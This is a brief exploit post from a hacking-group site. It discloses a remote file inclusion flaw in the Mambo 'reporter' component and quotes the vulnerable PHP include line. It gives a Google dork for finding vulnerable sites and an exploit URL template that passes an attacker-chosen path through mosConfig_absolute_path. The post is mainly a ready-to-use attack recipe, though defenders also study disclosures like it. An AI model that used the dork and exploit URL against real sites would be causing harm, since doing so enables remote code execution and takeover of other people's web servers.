Reporter Mambo Component Remote File include

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title :  Reporter  Mambo Component Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]

------------------------------------------------------------------------
--------

Google Dorks  : inurl:"/com_reporter/"

------------------------- -------------------------------------------------------

Application :  reporter Component of Mambo

------------------------------------------------------------------------
--------

Bug ?n  reporter.sql.php

require_once($mosConfig_absolute_path.'/components/com_reporter/view/'.$
view_class.'.view.php');

$page = new ResultView($result);

------------------------------------------------------------------------
--------

Exploit:

http://[target]/[mambo_path]/components/com_reporter/processor/reporter.
sql.php?mosConfig_absolute_path=

------------------------------------------------------------------------
--------

greets:

All My Friends And SiberSavascilar.Com Members !

------------------------------------------------------------------------
--------

--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------